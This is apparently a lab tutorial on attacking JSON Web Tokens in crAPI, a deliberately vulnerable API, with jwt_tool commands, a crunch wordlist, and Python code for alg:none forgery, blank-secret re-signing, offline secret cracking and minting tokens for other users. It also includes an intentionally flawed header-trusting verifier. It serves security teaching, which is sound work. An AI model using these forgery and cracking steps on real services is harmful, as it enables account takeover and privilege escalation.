API Token Attacks focusing on JSON Web Token (JWT) Attacks (crAPI as an Example)
Many APIs use JSON Web Tokens (JWT) for authentication and authorization.
JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact, self-contained way of transmitting claims between parties as a JSON object that is signed (or MACed) and, optionally, encrypted.
We will continue with crAPI as our target. First, send the login request to Burp Suite and locate the token in the response.
Then send that request to the Sequencer,
choose "Custom location" and select the token value in the response as the item to sample,
and start the live capture.
"Auto analyze" can be switched on so the analysis refreshes as tokens arrive.
Wait until the capture finishes, then press "Analyze now".
Once the analysis completes, the summary reports the overall quality of randomness as extremely poor.
The character-level and bit-level views show where the tokens vary and where they do not.
After this, save the captured tokens and look at them directly:
most of each token is identical, because the header and the claims (subject, role) are the same for every login of the same user; only the timestamps and the signature change.
Note that a poor Sequencer score does not mean valid tokens can be brute-forced with Intruder: the signature is what the server checks, and guessing it is infeasible. What the low entropy really tells us is that nothing in the token is random, so its security rests entirely on the signature check, which is what the attacks that follow probe.
From here we will try some attacks on JWTs.
First we authenticate and look at the token.
JWT parts are base64url-encoded (not encrypted), so anyone holding the token can read the header and the claims,
and we can see it in the response as follows:
How do we know that it is a JWT? There are two methods:
First, go to jwt.io and paste the token we got;
as we can see, the token has three main parts: Header, Payload and Signature.
The second method is to pipe each part to a Base64 decoder, either the base64 command in Kali or the Decoder tab in Burp Suite (base64url uses '-' and '_' instead of '+' and '/', and drops the '=' padding, so a strict decoder may need those restored).
In a JWT each part is separated by a dot (.).
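To see what the three parts hold without relying on jwt.io, here is a small decoder in Python, added as an example (it is not part of the original walkthrough, of crAPI or of jwt_tool). It uses the token from the login response above; the function names and the `looks_like_jwt` heuristic are ours.

```python
import base64
import json

# Token returned by the crAPI login earlier on this page (the value is the page's own).
CRAPI_TOKEN = (
    "eyJhbGciOiJSUzI1NiJ9."
    "eyJzdWIiOiJhbWFAYW1hLmNvbSIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNjc2MTIxOTI5LCJleHAiOjE2NzY3MjY3Mjl9."
    "Ft8SfGDz4LtOHo2kzTYOfK9VaaX7MAfz_YAXWxF8QC7OgRFE2jaM18FzRdgmihbTk9gl993EBILXqGUbZ23bvLWU3SYH2GGwA0wmqPztl4KJYewT9u1YIQveu8jadsSFmLgy25y6NMebpP6VYjpOevHBbwyTmdWB_RQYqGYQJHUeIGVOkypxWL3w60rVPmqvQQHpxYX4Hoc_W7iEWQK5EROH5LZ7cgEpSvPBUHeybpc4jXJl8QxmI8r0IP2gY5SQtZHk6ry5RWXj-mMqblw6w2has_M9anqV7BE-AO-lkkJ1y1oqBfPqHJlY0hoyr1w6-jj7qJmZBUGV0L-15_MSMg"
)

def b64url_decode(segment: str) -> bytes:
    """JWT parts are base64url without '=' padding; restore it or strict decoders fail."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def parse_jwt(token: str) -> dict:
    """Split a compact JWS into header, payload and raw signature.
    No verification happens here; this is the same view jwt.io or `base64 -d` gives."""
    parts = token.strip().split(".")
    if len(parts) != 3:
        raise ValueError(f"expected 3 dot-separated parts, got {len(parts)}")
    header_b64, payload_b64, sig_b64 = parts
    return {
        "header": json.loads(b64url_decode(header_b64)),
        "payload": json.loads(b64url_decode(payload_b64)),
        "signature": b64url_decode(sig_b64),
    }

def looks_like_jwt(candidate: str) -> bool:
    """Heuristic (ours): three base64url parts whose first decodes to a JSON object with 'alg'."""
    try:
        parsed = parse_jwt(candidate)
    except ValueError:  # bad base64, bad JSON and a wrong part count all end up here
        return False
    return isinstance(parsed["header"], dict) and "alg" in parsed["header"]

def lifetime_seconds(payload: dict) -> int:
    """How long the token stays valid: exp minus iat (both Unix timestamps)."""
    return int(payload["exp"]) - int(payload["iat"])

if __name__ == "__main__":
    parsed = parse_jwt(CRAPI_TOKEN)
    print("header   :", parsed["header"])
    print("payload  :", parsed["payload"])
    print("signature:", len(parsed["signature"]), "bytes")
    print("lifetime :", lifetime_seconds(parsed["payload"]) // 86400, "days")
```

Two things worth writing down from the output before attacking anything: the header carries only `alg: RS256` (an RSA signature, consistent with the 256-byte signature of a 2048-bit key), so there is no shared secret in play unless the server also accepts HMAC algorithms; and `exp` minus `iat` is seven days, a long lifetime for a bearer token that is a finding in its own right.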
From here we will use jwt_tool to analyse and attack our token.
First we analyse it in Playbook mode; the command is as follows (-t is the target endpoint and -rh the request header jwt_tool sends each test token in):
# jwt_tool -t http://127.0.0.1:8888/identity/api/v2/user/dashboard -rh "Authorization: Bearer eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhbWFAYW1hLmNvbSIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNjc2MTIxOTI5LCJleHAiOjE2NzY3MjY3Mjl9.Ft8SfGDz4LtOHo2kzTYOfK9VaaX7MAfz_YAXWxF8QC7OgRFE2jaM18FzRdgmihbTk9gl993EBILXqGUbZ23bvLWU3SYH2GGwA0wmqPztl4KJYewT9u1YIQveu8jadsSFmLgy25y6NMebpP6VYjpOevHBbwyTmdWB_RQYqGYQJHUeIGVOkypxWL3w60rVPmqvQQHpxYX4Hoc_W7iEWQK5EROH5LZ7cgEpSvPBUHeybpc4jXJl8QxmI8r0IP2gY5SQtZHk6ry5RWXj-mMqblw6w2has_M9anqV7BE-AO-lkkJ1y1oqBfPqHJlY0hoyr1w6-jj7qJmZBUGV0L-15_MSMg" -M pb
Playbook results
In Playbook mode jwt_tool runs a series of known JWT exploits against the target, among them weak-password (secret) checks, and reports which forged tokens the API accepted.
We can also run the algorithm "none" attack on its own with jwt_tool:
# jwt_tool eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhbWFAYW1hLmNvbSIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNjc2MTIxOTI5LCJleHAiOjE2NzY3MjY3Mjl9.Ft8SfGDz4LtOHo2kzTYOfK9VaaX7MAfz_YAXWxF8QC7OgRFE2jaM18FzRdgmihbTk9gl993EBILXqGUbZ23bvLWU3SYH2GGwA0wmqPztl4KJYewT9u1YIQveu8jadsSFmLgy25y6NMebpP6VYjpOevHBbwyTmdWB_RQYqGYQJHUeIGVOkypxWL3w60rVPmqvQQHpxYX4Hoc_W7iEWQK5EROH5LZ7cgEpSvPBUHeybpc4jXJl8QxmI8r0IP2gY5SQtZHk6ry5RWXj-mMqblw6w2has_M9anqV7BE-AO-lkkJ1y1oqBfPqHJlY0hoyr1w6-jj7qJmZBUGV0L-15_MSMg -X a
jwt_tool writes out the alg:none variants and we try each one as the bearer token. Here the attack is patched: the API rejects them and we get a 404 error.
We can also try the blank-password attack, which re-signs the token with HS256 and an empty secret:
# jwt_tool eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhbWFAYW1hLmNvbSIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNjc2MTIxOTI5LCJleHAiOjE2NzY3MjY3Mjl9.Ft8SfGDz4LtOHo2kzTYOfK9VaaX7MAfz_YAXWxF8QC7OgRFE2jaM18FzRdgmihbTk9gl993EBILXqGUbZ23bvLWU3SYH2GGwA0wmqPztl4KJYewT9u1YIQveu8jadsSFmLgy25y6NMebpP6VYjpOevHBbwyTmdWB_RQYqGYQJHUeIGVOkypxWL3w60rVPmqvQQHpxYX4Hoc_W7iEWQK5EROH5LZ7cgEpSvPBUHeybpc4jXJl8QxmI8r0IP2gY5SQtZHk6ry5RWXj-mMqblw6w2has_M9anqV7BE-AO-lkkJ1y1oqBfPqHJlY0hoyr1w6-jj7qJmZBUGV0L-15_MSMg -X b
We try this token in the same way as the previous one:
and as we can see, the token signed with a blank password is accepted.
From here we try a cracking attack on the signing secret. One caveat first: the header of our token says RS256, an RSA signature, which has no shared secret to crack; a dictionary attack only pays off if the server also verifies HS-signed tokens with a shared secret, which is exactly what the blank-password test above probes.
First we create a password list using crunch (every 5-character lowercase string: 26^5 = 11,881,376 lines, about 71 MB):
# crunch 5 5 -o crapipw.txt
and then feed it to jwt_tool in crack mode (-C) with that dictionary (-d). The cracking is entirely offline, so the API never sees the guesses:
# jwt_tool eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhbWFAYW1hLmNvbSIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNjc2MTI0NjM5LCJleHAiOjE2NzY3Mjk0Mzl9.WkfD20dmgVLa1rWZ3anpsSjjO5raVXiokiSqV8BIMiIZTQAFEpdTUe3zWoOf-JvUB1mMbkXkD_Mzk70sh88_-PLQoyuoE_rgvTWzHdZFh5jXwDjC5JengUwCYhI6szGULvT5pe0iyAWvu2TWYZ_-3HuqtazoSY20LDzVCYpR11Jpei5NENvxMisce9m0EL0qqlmUMJMjHvRem-indK7GJZ5GcubD83O9QL_4Kr2iYlm5257_x4XR7Jh7PqM00YprgaX-ND6w351GYwO4LmUs4kGhiTlLZpVPpBo33BNLgvdwSf2mHcZmWL_erEBpik4RDlXPf9FE8KfHR_KIDtXkvg -C -d crapipw.txt
With the recovered secret we can mint our own trusted tokens.
First we take another user's email address,
then go to jwt.io and create a new token with that email as the subject, signed with the cracked secret,
and try it in Postman.
That is the full workflow for cracking the signing secret and turning it into tokens of our choosing.
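The four jwt_tool steps above (alg none, blank password, dictionary crack, minting a token for another user) in plain Python, added here as an example; it is not code from the page, from jwt_tool or from crAPI. Because a dictionary attack only makes sense against an HMAC-signed token, the sample token is built with HS256 and a constructed 5-letter secret (`qwert`, not a real crAPI secret), and the wordlist, the claim values and the two verifiers are ours. The first verifier has the flaw the `none` attack needs (it lets the token's header choose the algorithm); the second pins the algorithm, and against it only the weak secret still gets an attacker a token for any user.

```python
import base64
import hashlib
import hmac
import itertools
import json
import string
from typing import Iterable, Optional

def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def encode_part(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())

def decode_part(segment: str) -> dict:
    return json.loads(b64url_decode(segment))

def hs256(signing_input: bytes, secret: bytes) -> bytes:
    return hmac.new(secret, signing_input, hashlib.sha256).digest()

def make_hs256(header: dict, payload: dict, secret: bytes) -> str:
    signing_input = f"{encode_part(header)}.{encode_part(payload)}".encode()
    return signing_input.decode() + "." + b64url_encode(hs256(signing_input, secret))

def forge_alg_none(token: str, new_claims: dict, alg: str = "none") -> str:
    """jwt_tool -X a: edited claims, alg=none (or None/NONE/nOnE), empty signature."""
    header_b64, payload_b64, _ = token.split(".")
    header, payload = decode_part(header_b64), decode_part(payload_b64)
    header["alg"] = alg
    payload.update(new_claims)
    return f"{encode_part(header)}.{encode_part(payload)}."

def forge_hs256(token: str, new_claims: dict, secret: bytes) -> str:
    """Re-sign edited claims with HS256; jwt_tool -X b is the case secret=b""."""
    header_b64, payload_b64, _ = token.split(".")
    header, payload = decode_part(header_b64), decode_part(payload_b64)
    header["alg"] = "HS256"
    payload.update(new_claims)
    return make_hs256(header, payload, secret)

def crack_hs256(token: str, candidates: Iterable[str]) -> Optional[str]:
    """jwt_tool -C -d: recompute the HMAC per candidate; fully offline, the API sees nothing."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    signing_input, target = f"{header_b64}.{payload_b64}".encode(), b64url_decode(sig_b64)
    for secret in candidates:
        if hmac.compare_digest(hs256(signing_input, secret.encode()), target):
            return secret
    return None

def crunch_like(length: int, charset: str = string.ascii_lowercase) -> Iterable[str]:
    """The key space `crunch 5 5` writes to crapipw.txt when length=5 (26**5 strings)."""
    return ("".join(c) for c in itertools.product(charset, repeat=length))

def verify_trusting_header(token: str, secret: bytes) -> Optional[dict]:
    """The flaw the none attack needs: the token's own header picks the algorithm."""
    header_b64, payload_b64, _ = token.split(".")
    alg = str(decode_part(header_b64).get("alg", "")).lower()
    if alg == "none":
        return decode_part(payload_b64)  # signature never looked at
    return verify_pinned(token, secret) if alg == "hs256" else None

def verify_pinned(token: str, secret: bytes) -> Optional[dict]:
    """Hardened: the algorithm is fixed server-side; the header may only agree with it."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    if decode_part(header_b64).get("alg") != "HS256":
        return None
    expected = hs256(f"{header_b64}.{payload_b64}".encode(), secret)
    return decode_part(payload_b64) if hmac.compare_digest(expected, b64url_decode(sig_b64)) else None

# Constructed sample, not a real crAPI secret: HS256 with a 5-letter secret, so it
# lies inside the `crunch 5 5` space and the dictionary attack finishes instantly.
WEAK_SECRET = b"qwert"
BASE_CLAIMS = {"sub": "ama@ama.com", "role": "user", "iat": 1676121929, "exp": 1676726729}
VICTIM_TOKEN = make_hs256({"alg": "HS256"}, BASE_CLAIMS, WEAK_SECRET)
WORDLIST = ["password", "secret", "admin", "qwert"]  # stand-in for crapipw.txt

def run_attacks(token: str = VICTIM_TOKEN, wordlist: Iterable[str] = WORDLIST) -> dict:
    none_token = forge_alg_none(token, {"role": "admin"})
    blank_token = forge_hs256(token, {"role": "admin"}, b"")
    secret = crack_hs256(token, wordlist)
    results = {
        "none_vs_trusting": verify_trusting_header(none_token, WEAK_SECRET),
        "none_vs_pinned": verify_pinned(none_token, WEAK_SECRET),
        "blank_vs_pinned": verify_pinned(blank_token, WEAK_SECRET),
        "cracked_secret": secret,
        "forged_vs_pinned": None,
    }
    if secret is not None:  # the page's last step: mint a token for another user
        forged = forge_hs256(token, {"sub": "other@ama.com", "role": "admin"}, secret.encode())
        results["forged_vs_pinned"] = verify_pinned(forged, WEAK_SECRET)
    return results

if __name__ == "__main__":
    for name, result in run_attacks().items():
        print(f"{name}: {result}")
```

Reading the results: the `none` token passes the header-trusting verifier and fails the pinned one; the blank-password token fails both because the server's secret is not empty, so that attack only ever works when the server's key really is blank; and the cracked secret defeats even the pinned verifier, which is why a strong, random HMAC secret (or an asymmetric algorithm with no shared secret at all) is the only fix for the last step. Swap `WORDLIST` for `crunch_like(5)` to reproduce the page's full 26^5 search.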
As we can see, if the JWT implementation is weak or the secret key is not strong enough, we can perform many attacks and possibly mint our own tokens. We also learned to use jwt_tool and Burp Suite to attack API tokens in order to gain access or escalate our privileges in the API.